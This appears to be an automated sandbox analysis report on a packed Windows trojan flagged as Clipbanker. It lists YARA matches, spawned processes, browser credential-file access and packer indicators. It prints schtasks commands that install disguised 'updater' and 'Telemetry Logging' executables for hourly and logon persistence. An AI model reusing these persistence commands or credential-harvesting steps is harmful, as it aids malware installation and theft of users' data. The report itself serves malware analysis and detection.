            Source: 17.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 00000013.00000002.2460266314.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 00000013.00000002.2460266314.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 00000009.00000002.2211800433.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 00000009.00000002.2211800433.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 00000007.00000002.2220685526.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 00000007.00000002.2220685526.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 00000008.00000002.2218340799.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 00000008.00000002.2218340799.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 0000000E.00000002.4441908172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 0000000E.00000002.4441908172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 00000012.00000002.2379291934.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 00000012.00000002.2379291934.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@24/32@5/4
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D29130 CreateToolhelp32Snapshot,Process32First,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,
            Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqlite
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_03
            Source: C:\Users\user\Desktop\file.exe | Mutant created: \Sessions\1\BaseNamedObjects\slickSlideAnd2
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5068:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe | Mutant created: \Sessions\1\BaseNamedObjects\jW5fQ5e-C7lR7tC1q
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6756:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4748:120:WilError_03
            Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\trixy1UB98D2D2zeo
            Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: file.exe, 00000000.00000002.4442200408.000000000030D000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: file.exe, 00000000.00000003.2113965338.000000000647E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.000000000647E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE autofill (name VARCHAR, value VARCHAR, value_lower VARCHAR, da`;H
            Source: file.exe, 00000000.00000002.4442200408.000000000030D000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: file.exe, 00000000.00000003.2122632450.0000000006540000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124050663.000000000173B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2112112086.0000000006483000.00000004.00000020.00020000.00000000.sdmp, HYMDMNDHbpvCLogin Data.0.dr, yDHoBcv6VALYLogin Data For Account.0.dr, KNCS9xAjcy97Login Data.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
            Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
            Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
            Source: unknown | Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
            Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe "C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe"
            Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe | Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe | Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
            Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe | Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
            Source: unknown | Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe "C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe"
            Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: wtsapi32.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: d3d11.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: dxgi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: resourcepolicyclient.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: d3d10warp.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: dxcore.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: devobj.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: vaultcli.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: linkinfo.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ntshrui.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: cscapi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: slc.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: d2d1.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe | Section loaded: apphelp.dll
            Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe | Section loaded: windows.storage.dll
            Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe | Section loaded: wldp.dll
            Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe | Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe | Section loaded: apphelp.dll
            Source: EdgeMS2.lnk.0.dr | LNK file: ..\..\..\..\..\..\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe
            Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: file.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
            Source: file.exe | Static file information: File size 8778752 > 1048576
            Source: file.exe | Static PE information: Raw size of .vmpY[. is bigger than: 0x100000 < 0x838200

            Data Obfuscation

            Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe | Unpacked PE file: 7.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe | Unpacked PE file: 8.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe | Unpacked PE file: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe | Unpacked PE file: 14.2.oobeldr.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe | Unpacked PE file: 17.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe | Unpacked PE file: 18.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe | Unpacked PE file: 19.2.EdgeMS2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D4C990 SetThreadExecutionState,SetThreadExecutionState,GetVersion,GetCurrentThreadId,GetThreadDesktop,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GdiplusStartup,CreateThread,CloseHandle,
            Source: initial sample | Static PE information: section where entry point is pointing to: .vmpY[.
            Source: file.exe | Static PE information: section name: .vmp#+
            Source: file.exe | Static PE information: section name: .vmp#+
            Source: file.exe | Static PE information: section name: .vmp#+
            Source: file.exe | Static PE information: section name: .vmpY[.
            Source: file.exe | Static PE information: section name: .vmpY[.
            Source: l2[1].exe.0.dr | Static PE information: section name: .MPRESS1
            Source: l2[1].exe.0.dr | Static PE information: section name: .MPRESS2
            Source: llmcrdwzLnNKYB4T0Vnw.exe.0.dr | Static PE information: section name: .MPRESS1
            Source: llmcrdwzLnNKYB4T0Vnw.exe.0.dr | Static PE information: section name: .MPRESS2
            Source: AdobeUpdaterV2.exe.0.dr | Static PE information: section name: .MPRESS1
            Source: AdobeUpdaterV2.exe.0.dr | Static PE information: section name: .MPRESS2
            Source: MSIUpdaterV2.exe.0.dr | Static PE information: section name: .MPRESS1
            Source: MSIUpdaterV2.exe.0.dr | Static PE information: section name: .MPRESS2
            Source: EdgeMS2.exe.0.dr | Static PE information: section name: .MPRESS1
            Source: EdgeMS2.exe.0.dr | Static PE information: section name: .MPRESS2
